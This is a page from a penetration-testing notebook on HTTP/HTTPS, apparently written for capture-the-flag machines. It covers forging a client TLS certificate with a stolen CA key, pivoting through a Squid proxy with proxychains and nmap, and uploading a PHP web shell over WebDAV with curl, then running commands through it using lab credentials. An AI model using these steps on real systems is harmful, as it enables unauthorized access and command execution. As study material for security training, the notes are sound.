🔮
P4n1cBook
  • 🏴‍☠️Welcome!
    • 🔮P4n1cBook
    • 📚Bookmarks
    • 🚨Licence and Disclaimer
  • Fundamentals
    • Starter Kit
      • Linux
      • PowerShell
      • Git
      • 💾Regex
      • Network Analysis
        • curl
        • tcpdump
        • Nmap
        • 🦈Wireshark
      • Metasploit
    • 🌐Network Protocols
      • ICMP
      • SSH
      • Telnet
      • DNS
      • FTP
      • HTTP/HTTPS
      • SMB
      • SNMP
      • SMTP
      • NFS
      • IPP
      • WinRM
      • LLMNR
      • JDWP
    • Code
      • Python Essentials
      • C & C++
    • Web APIs
      • GraphQL
    • Shells/TTYs
    • Dorks
    • Cryptography
    • Reverse Engineering
      • GDB
      • Binaries
  • Web Exploitation
    • Web Enumeration
      • User Endpoints
      • Web Fuzzing
        • ffuf
        • feroxbuster
        • Gobuster
        • GoWitness
      • Web Servers
        • Apache
        • Nginx
        • Werkzeug
      • Databases
        • MySQL
        • NoSQL
          • MongoDB
          • Redis
      • Web Services/Frameworks
        • Wordpress
        • Laravel
        • Express
        • Magento
        • AIOHTTP
        • HashiCorp Vault
        • Tiny File Manager
        • Joomla
        • CMS Made Simple
        • 🌵Cacti
        • Tomcat
        • Zabbix
        • OpenNetAdmin
        • ImageMagick
    • Vulnerabilities
      • Arbitrary File Read
      • Session Hijacking
      • SSRF
      • Eval Injection
      • Template Manipulation
      • Path Traversal
      • Prototype Pollution
      • XXE
      • Deserialization
      • Log Poisoning
      • Arbitrary Command Execution
      • SQLi
        • SQLmap
      • SSI
      • SSTI
      • LFI
      • XSS
    • Java-based web application
      • Struts
      • .WAR
      • pd4ml.jar
  • Cloud Exploitation
    • Kubernetes
    • AWS
  • Post Exploitation
    • File Transfer
      • Exfiltration
    • Credential Dumping
      • Thunderbird
    • Lateral Movement
    • Persistence
    • Linux Privilege Escalation
      • Static Binaries
      • Enumeration
      • Hijacks
      • Command Injection
      • Jailbreaks
      • Binary Exploitation - Linux
      • Kernel Exploits
      • Buffer Overflow - Linux
      • Docker
      • Abusing Wildcards
  • Wireless Exploitation
    • NFC
Powered by GitBook
On this page
Edit on GitHub
  1. Fundamentals
  2. Network Protocols

HTTP/HTTPS

HyperText Transfer Protocol - Port 80/443

PreviousFTPNextSMB

Last updated 2 months ago

Generate a TLS Certificate

With the CA private key already

  1. Verify Client Certificate Requirements:

openssl s_client -connect 10.10.10.131:443
  1. Generate the client's private key:

openssl genrsa -out client.key 4096
  1. Create a certificate signing request (CSR) , ensure the fields match the server's expectations:

openssl req -new -key client.key -out client.req
  1. Sign the CSR with the CA’s private key to issue a client certificate :

openssl x509 -req -in client.req -CA lacasadepapel-htb.pem -CAkey ca.key -set_serial 101 -extensions client -days 365 -outform PEM -out client.cer
  1. Convert the private key and certificate into a PKCS#12 (.p12) format file for easy import:

openssl pkcs12 -export -inkey client.key -in client.cer -out client.p12
Squid Proxy

Port 3128

  • The config file normally lives in /etc/squid/squid.conf

  • Relays on /usr/lib/squid/basic_ncsa_auth for authentication and the program stores the passwords in /etc/squid/passwords.

  • Check if you can reverse it to access the local network.

  • First add the address and port to the last line of your proxychains.conf file:

http 10.10.10.67 312
  • Then, just nmap the localhost:

proxychains nmap -n -sT 127.0.0.1

Upstream Proxy Server

  1. On burp go to Settings > Network > Connections

  2. Create a new rule with * for the Destination Host, set the target proxy as the Proxy Host/Port and set the credentials with basic Authentication type.

  3. In order to fuzz the localhost, set a Proxy Listener, redirect to 127.0.0.1:80 and set 127.0.0.1:1234 as the interface.

  4. Now add the interface to /etc/proxychains.conf.

WebDAV

Web Distributed Authoring and Versioning, an extension of the HTTP protocol that allows users to collaboratively edit and manage files stored on a remote server.

  • Extends HTTP methods like GET and POST with additional ones like PROPFIND, PROPPATCH, MKCOL, DELETE, COPY, MOVE, and LOCK.

  • Credentials can be found at webdav.passwd.

  • can be use for enumeration.


Upload files
curl --upload-file ./file.php --user <UserName>:<Password> http://10.10.10.67/webdav_test_inception/
Run commands from revshell
curl --data-urlencode 'cmd=id' http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/file.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Enumeration
davtest.pl -url http://10.10.10.67/webdav_test_inception -auth <UserName>:<Password>
🌐
devtest